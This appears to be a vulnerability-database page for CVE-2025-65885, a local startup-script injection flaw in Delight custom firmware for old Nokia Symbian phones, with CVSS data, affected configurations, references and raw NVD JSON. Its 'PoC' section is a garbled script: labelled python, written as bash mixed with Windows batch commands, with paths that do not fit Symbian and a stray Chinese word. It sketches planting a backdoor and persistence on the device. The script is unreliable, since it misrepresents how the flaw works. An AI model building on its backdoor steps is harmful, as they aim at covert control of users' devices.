CVE-2025-65885

Description

An issue was discovered in the Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) allowing local attackers to inject startup scripts via crafted .txt files in the :\Data directory.

CVSS Details

CVSS Score

5.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:symwld:delight_custom_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nokia:808_pureview:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:symwld:delight_custom_firmware:6.7:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nokia:c7:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nokia:n8:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:symwld:delight_custom_firmware:1.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nokia:e7:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:symwld:delight_custom_firmware:1.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nokia:701:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nokia:c6-01:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:symwld:delight_custom_firmware:1.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nokia:500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nokia:700:-:*:*:*:*:*:*:* - NOT VULNERABLE

Nokia 808 (Delight v1.8)

Nokia N8 (Delight v6.7)

Nokia E7 (Delight v1.3)

Nokia C7 (Delight v6.7)

Nokia 700 (Delight v1.2)

Nokia 701 (Delight v1.1)

Nokia 603 (Delight v1.0)

Nokia 500 (Delight v1.2)

Nokia E6 (Delight v1.0)

Nokia Oro (Delight v1.0)

Vertu Constellation T (Delight v1.0)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-65885 PoC - Startup Script Injection in Delight CFW
# Target: Nokia Symbian Belle devices with Delight Custom Firmware

# Create malicious startup script file
cat > ':\\Data\\startup_inject.txt' << 'EOF'
# Delight CFW Startup Script Injection PoC
# This script demonstrates the injection vulnerability

# Create a backdoor entry in autoexec.bat or equivalent
if exist C:\\sys\\bin\\autostart.exe (
    echo Backdoor already exists
) else (
    # Inject malicious code that would execute on startup
    echo @echo off > C:\\sys\\bin\\malicious.bat
    echo rem Injected by CVE-2025-65885 >> C:\\sys\\bin\\malicious.bat
    echo # Add reverse shell or persistence mechanism here >> C:\\sys\\bin\\malicious.bat
)

# Alternative: Direct command injection
# The system reads .txt files from :\Data and executes them
# An attacker can place commands that will run with elevated privileges

# Example payload structure:
# 1. Create file at :\Data\config.txt
# 2. Insert shell commands
# 3. Wait for system/service restart
# 4. Commands execute with system privileges

# Cleanup痕迹
del startup_inject.txt
EOF

echo "PoC file created. When device restarts, malicious commands will execute."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65885
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65885
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65885/
[4] VulDB https://vuldb.com/cve/CVE-2025-65885
[5] https://gist.github.com/symbuzzer/3315e88adc2bba0b6cc66d192b49546d
[6] https://www.symwld.com/delight/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65885", "sourceIdentifier": "[email protected]", "published": "2025-12-26T15:15:47.357", "lastModified": "2026-01-09T20:55:05.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in the Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) allowing local attackers to inject startup scripts via crafted .txt files in the :\\Data directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:symwld:delight_custom_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "0ACE5139-198E-41F3-8DF4-F45F75D8A8BC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:808_pureview:-:*:*:*:*:*:*:*", "matchCriteriaId": "91B473B5-09FD-4D6E-8E9D-0BD666D25251"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:symwld:delight_custom_firmware:6.7:*:*:*:*:*:*:*", "matchCriteriaId": "76578E3B-F555-4490-B7BE-0C0C395BCBE5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:c7:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E30415E-0053-4A67-AEC0-D496B69B850D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nokia:n8:-:*:*:*:*:*:*:*", "matchCriteriaId": "EEE22416-7795-4AD0-8B38-9D134AD4C8EA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:symwld:delight_custom_firmware:1.3:*:*:*:*:*:*:*", "matchCriteriaId": "276C663C-4D54-45F4-9163-B46FD8D3800D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:e7:-:*:*:*:*:*:*:*", "matchCriteriaId": "BFC3690E-15F7-4DB2-A6F8-8BE2AF34E8FB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:symwld:delight_custom_firmware:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "0CC5B20B-349E-4FB5-A95A-3001300D651C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:701:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1658273-4B77-422D-BB8A-89ADA884A88E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nokia:c6-01:-:*:*:*:*:*:*:*", "matchCriteriaId": "FBE6EF65-6D91-430B-93C9-24633B8EED20"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:symwld:delight_custom_firmware:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "B48AB592-FB93-46C9-BEF5-441DEF18A356"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:500:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A333268-3490-40B0-9031-5F9F2EFD4ED5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nokia:700:-:*:*:*:*:*:*:*", "matchCriteriaId": "8F1AB444-DC27-47A6-80F5-D43091DE34D2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:symwld:delight_custom_firmware:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "08E9AC2A-C233-49AC-B7BF-EFB0AAD192D2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:603:-:*:*:*:*:*:*:*", "matchCriteriaId": "08299623-6FBC-45C4-B468-E6C0A18F168F"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nokia:e6:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D8E50F3-6278-4C9D-A38B-90734E891C2A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nokia:oro:-:*:*:*:*:*:*:*", "matchCriteriaId": "33CE99CE-8DB1-4E59-8AF7-8254724CA794"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nokia:vertu_constellation_t:-:*:*:*:*:*:*:*", "matchCriteriaId": "88E46619-6394-4E5E-AD74-BEBF3D435EC6"}]}]}], "references": [{"url": "https://gist.github.com/symbuzzer/3315e88adc2bba0b6cc66d192b49546d", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.symwld.com/delight/", "source": "[email protected]", "tags": ["Prod ... (truncated)